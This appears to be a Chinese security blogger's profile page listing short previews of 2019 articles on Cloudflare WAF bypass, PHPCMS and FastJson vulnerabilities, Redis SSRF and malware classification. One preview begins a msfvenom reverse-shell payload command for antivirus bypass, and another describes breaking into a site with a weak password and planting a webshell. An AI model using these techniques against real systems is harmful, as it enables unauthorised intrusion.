单纯小白

isnull

0关注
23粉丝
194文章
返回网站首页

您已发布 194篇文章作品写文章

利用源服务器IP地址绕过Cloudflare WAF

前言CloudFlare是一个被人们广泛使用的Web应用防火墙(WAF)提供商。但是,如果你能在一秒钟内绕过所有这些保护措施,使WAF变得无用,那又会怎样呢?本文是关于绕过具有源站IP地址的Cloudflare WAF的教程。下面的介绍不单单局限于Cloudflare WAF介绍Cloudflare拥有1600多万个互联网属性,现在是最流行的web应用程序防火墙(WAF)之一。一年前,Cloudf

 2019-8-3
 0 
 1546 

PHPCMS漏洞分析合集(下)

本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。v9.6.1任意文件读取这个版本的 任意文件读取 漏洞和上个版本的 SQL注入 漏洞原理是类似的,且出问题的文件均在 phpcms/modules/conte

 2019-7-28
 0 
 1526 

PHPCMS漏洞分析合集(上)

本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。v9.6.0任意文件上传这个漏洞存在于用户注册处。这里有一个可控变量 $_POST['info'] 传入了 member_input 类的 g

 2019-7-28
 0 
 1351 

PHP 审计中的一些小操作

前言最近在学习中学到了不少审计时的小技巧,都比较简单,但有一些在代码中比较容易出现的错误,这里做了一下总结分享,有错误希望师傅们斧正,一起交流学习。for 循环中的 count这个小技巧是从这里看到的:关于CMSMS中SQL注入漏洞的复现与分析与利用当 count 出现在 for 循环中,count 每次都会计算,如果这时候数组发生了变化,就会有一些差异。例子:<?php $a&

 2019-7-21
 0 
 910 

恶意样本家族分类实践

前记最近有一个项目需求,需要将恶意样本的厂商描述给汇聚成一组统一的标签,然后后续需要对恶意样本的流量及行为进行特征提取和机器学习来实现恶意样本的检测。简单点来讲所做的恶意样本家族分类其实就是一个数据清洗和打标签的过程。数据样本量有90000多条,主要采集于virusshare,这里就以virustotal为例,实际效果其实是一样的这里大概有大概几十家厂商,但是各家厂商的标签都不一样,甚至连标签描述

 2019-7-20
 0 
 1024 

FastJson最新反序列化漏洞分析

漏洞危害:严重FastJson最新爆出的绕过方法可以通杀1.2.48版本以下所有,有传言在autotype开启的情况下可以打到1.2.57。## 解决方案:FastJson升级到最新1.2.58版本;采用默认的关闭autotype## 漏洞详情:fastjson是alibaba开源的一款高性能功能完善的JSON库,在2017年4月18日的时候官方自己爆出了一个安全漏洞,https://github

 2019-7-20
 0 
 1106 

MSF利用python反弹shell-Bypass AV

本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.16

 2019-7-17
 0 
 1271 

记一次有趣的渗透测试

别人都放假了我们却还在小学期中,这两天女朋友老是抱怨小学期作业难做,然后她今天发现淘宝上有人花钱代做,遂发来网址让我看看咱也不知道,咱也不敢问然后反手一个弱口令进了后台'其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传直接传了个大马,执行命令看下权限这权限也太小了吧,先来提权,看下补丁这还不随便打了,传了几个提权exe之后

 2019-7-17
 0 
 1407 

浅析Redis中SSRF的利用

SSRF介绍SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。前置知识文章中的数据包构造会涉及到redis的RESP协议,所以我们这里先科普一下,了解RESP协议的师傅可以跳过=。=RESP协议Redis服务

 2019-7-16
 0 
 1234